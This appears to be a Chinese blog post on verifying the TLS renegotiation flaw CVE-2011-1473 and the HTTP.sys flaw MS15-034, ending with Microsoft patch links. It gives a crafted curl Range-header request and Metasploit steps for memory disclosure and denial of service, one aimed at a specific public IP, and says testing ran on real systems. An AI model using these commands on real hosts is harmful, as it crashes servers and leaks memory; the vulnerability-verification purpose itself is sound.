CVE-2011-1473-验证

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了CVE-2011-1473-验证相关的知识,希望对你有一定的参考价值。

参考技术A 使用bash脚本(tls-reneg )可验证
使用openssl可验证

一、执行命令:openssl s_client -connect host:端口,SSL握手成功:

二、输入R触发重协商,可重协商10次以上且连接未断开,重协商成功,漏洞存在。

chmod -R 777 脚本目录

一、cd脚本目录,执行命令:./tls-reneg.sh host:端口

MS15-034/CVE-2015-1635 HTTP远程代码执行漏洞 (漏洞验证)

以下内容并非在靶场,是在真实环境进行漏洞验证。

1️⃣漏洞测试

使用curl工具进行测试,测试命令:

curl http://1.1.1.1 -H "Host: 1.1.1.1" -H "Range: bytes=0-18446744073709551615"

2️⃣漏洞验证

📃利用ms15-034漏洞读取服务器内存数据

借助metasploit平台:

use auxiliary/scanner/http/ms15_034_http_sys_memory_dump 

set rhosts 1.1.1.1

run

服务器内存数据泄露

📃利用ms15-034漏洞进行ddos攻击

同样借助metasploit平台:

use auxiliary/dos/http/ms15_034_ulonglongadd 

set rhosts 110.167.237.158

set threads 10

run

攻击开始后,服务器瞬间蓝屏然后自动重启,由于实在真实环境中进行漏洞验证DDOS攻击危害严重所以不执行命令进行演示。

3️⃣风险程度

严重

4️⃣风险分析

当存在CVE-2015-1635漏洞的HTTP服务器接收到精心构造的HTTP请求时,可能触发远程代码在目标系统以系统权限执行以及敏感信息泄露。 该漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当 HTTP.sys 未正确分析经特殊设计的 HTTP请求时会导致此漏洞。 成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。

5️⃣解决办法

厂商补丁:

Microsoft

目前微软官方已经给出修复补丁(3042553),用户安装修复补丁即可:

https://technet.microsoft.com/zh-CN/library/security/ms15-034.aspx
https://support.microsoft.com/zh-cn/kb/3042553

以上是关于CVE-2011-1473-验证的主要内容,如果未能解决你的问题,请参考以下文章

解决办法服务器支持 TLS Client-initiated 重协商攻击(CVE-2011-1473)

【SSL】关于SSL的重协商,解决SSL 重协商拒绝服务安全漏洞

js正则表单验证汇总,邮箱验证,日期验证,电话号码验证,url验证,信用卡验证,qq验证

如何开发图形验证码?

tp5.1 验证规则 验证数字

js实现输入手机验证码后点击提交按钮验证手机输入的验证码和发送的验证码是不是一致